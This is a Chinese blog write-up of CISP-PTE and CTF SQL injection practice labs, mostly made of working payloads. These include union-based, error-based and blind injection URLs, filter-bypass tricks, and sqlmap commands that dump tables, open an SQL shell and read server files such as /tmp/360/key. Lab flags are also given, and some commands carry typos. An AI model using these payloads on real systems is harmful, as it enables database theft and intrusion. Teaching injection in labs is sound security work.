【CISP-PTE】SQL注入练习题

西原一点红

已于 2023-06-26 11:21:14 修改

阅读量1.4k

点赞数 2

分类专栏： # CISP-PTE 文章标签： sql python 数学建模

于 2023-06-26 11:12:02 首次发布

本文链接：https://blog.csdn.net/weixin_47055136/article/details/131392312

版权

CISP-PTE 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

文章目录

【CISP-PTE】SQL注入练习题

【CISP-PTE】SQL注入练习题

1. 今年的春节，不同往年

http://140.210.203.168:28881

1.1 手工注入

题目明确提示过滤了注释符 # –

通过单引号闭合，并注释绕过
闭合

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1

回显sql

select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'

闭合

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1

闭合成功
2. 爆列
逐一尝试

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,2,3,4,5 or 1='1
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,2,3,4,5,6 or 1='1

发现列数为6时，回显字段2
3. 爆库

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,database(),3,4,5,6 or 1='1

爆出库名为 web
4. 爆表

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1

爆出有两个表 Article IS_KEY
5. 爆表is_key的列

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1

爆出列为haha
6. 爆字段

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6'  union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1

得到key1:abcd1234

1.2 sqlmap 注入

注入

python  sqlmap.py  -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6"  --risk 3 --level 5

爆库

python  sqlmap.py  -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6"  --risk 3 --level 5  --current-db

爆表

python  sqlmap.py  -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6"  --risk 3 --level 5  -D 2web --tables

爆列

python  sqlmap.py  -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6"  --risk 3 --level 5  -D 2web -T IS_KEY --columns

爆字段

python  sqlmap.py  -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6"  --risk 3 --level 5  -D 2web -T IS_KEY -C"haha" --dump

2.文章发布系统

http://140.210.203.168:17111/admin.php
sqlmap注入
爆库

python  sqlmap.py  -u  “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5  --current-db

爆表

python  sqlmap.py  -u  “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5  -D 2web --tables

爆列

python  sqlmap.py  -u  “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5  -D 2web -T users1 --columns

爆字段

python  sqlmap.py  -u  “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5  -D 2web -T users1 -C“XremarkX4354” --dump

3. 文章发布系统2

sqlmap注入并执行sql-shell
http://118.195.198.108:20000
注册用户
发布文章抓包保存为sql.txt
sqlmap爆库

python  sqlmap.py  -r sql.txt --risk 3 --level 5   --current-db

爆表

python  sqlmap.py  -r sql.txt --risk 3 --level 5   -D 2web --tables

爆列

python  sqlmap.py  -r sql.txt --risk 3 --level 5   -D 2web -T users1 --columns

爆字段

python  sqlmap.py  -r sql.txt --risk 3 --level 5   -D 2web -T users1 -C“username,ox3a,password” --dump

发现无法爆出字段
总结已获得的信息库 2web 表 users1 列 username password
sqlmap执行sql shell

python  sqlmap.py  -r sql.txt  --sql-shell
select * from 2web.users1 limit 1 或者 select * from 2web.users1 where username='admin'

或者直接sqlmap执行sql

python  sqlmap.py  -r sql.txt  -sql-query="select * from 2web.users1 limit 1"

4. [第一章 web入门]SQL注入-1

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81
union联合注入
闭合

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #

发现# 被过滤

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+
%23 和--+未被过滤  闭合成功

爆列

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1'  order by 30 --+
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1'  order by 3 --+

爆出列数为3

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1'  union select 1,2,3 --+

得到字段列数为3
回显

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1'  union select 1,2,3 --+

爆库

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1'  union select 1,database(),3 --+ 得到库名 note

爆表

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3  --+

得到两张表 fl4g,notes
爆字段

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1'  union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3  --+

得到字段名为 fllllag

爆字段值

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1'  union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+

得到 flag n1book{union_select_is_so_cool}

5.sqlilabs 1-15

updatexml extractvalue

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1

闭合

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23

#被过滤
报错注入爆库

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23

爆表

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23

发现一次只能回显1行，用limit逐一爆

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23

emails

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 2,1)),1) %23

uagents

users

referers

为空  说明只有四个表
报字段

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 1,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 2,1)),1) %23

爆出三个字段 id username password
爆字段内容

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)  from users limit 0,1)),1) %23
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

发现回显内容被截取，结果显示不全，参考文档
https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W
MID()函数用于从文本字段中提取字符。 SELECT MID(column_name,start[,length]) FROM table_name;

Less-1 字符型注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1’ order by 5 --+
Less-2 数字型注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5
less-3 ‘)闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1’) --+
less-4 “)闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1”) --+
Less-5 报错注入
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1’ and updatexml(1,concat(1,database()),1) --+
http://node2.anna.nssctf.cn:28656/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+
Less-6 报错注入 “闭合
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1” and updatexml(1,concat(0x7e,database()),1)–+
Less-7 outfile
Less-7/?id=-1’ union select 1,2,@@datadir – # 获取数据存储路径
Less-7/?id=-1’ union select 1,2,@@basedir – # 获取安装路径
Less-7/?id=1’)) union select 1,2,3 into outfile “C:\phpStudy\WWW\sqli\Less-7\test.txt” – #
sqlmap --slq-shell
Less-8 布尔盲注 sqlmap
Less-9 时间盲注 sqlmap
?id=1’ and sleep(5) – - #延迟5s
?id=1‘’ and sleep(5) – -
?id=1 and sleep(5) – -
?id=1‘) and sleep(5) – -
?id=1‘‘) and sleep(5) – -
?id=1’ and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)=‘i’,sleep(3),1)-- -
Less-10 时间盲注 sqlmap
?id=1” and sleep(5) --+
Less-11 报错注入
’ and updatexml(1,concat(0x7e,database()),0) #
Less-12 闭合判断
") union select database(),2 #
Less-13 闭合判断 1’) or 1=1 #
1’) and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
Less-14 闭合判断 1“ or 1=1 #
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

6 宽字节注入 [极客大挑战 2019]HardSQL 1

http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23

7. sql 文件读取

http://192.168.213.22:81
通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。
注入判断

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1'  报错，存在注入点，回显sql select * from article where id= ('1'')
闭合
--+  # 均被过滤
;%00 闭合成功
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00
或者 （空格被过滤  用/**/或者%0a）
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1
爆字段个数
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/order//by/**/4;%00
union回显
union被过滤  双写绕过
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,4;%00
读取key文件 key:8b3h4a7v
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,load_file("/tmp/360/key");%00

西原一点红

关注

2
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
【CISP-PTE】SQL注入练习题

得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取，结果显示不全，参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时，回显字段2。
复制链接

扫一扫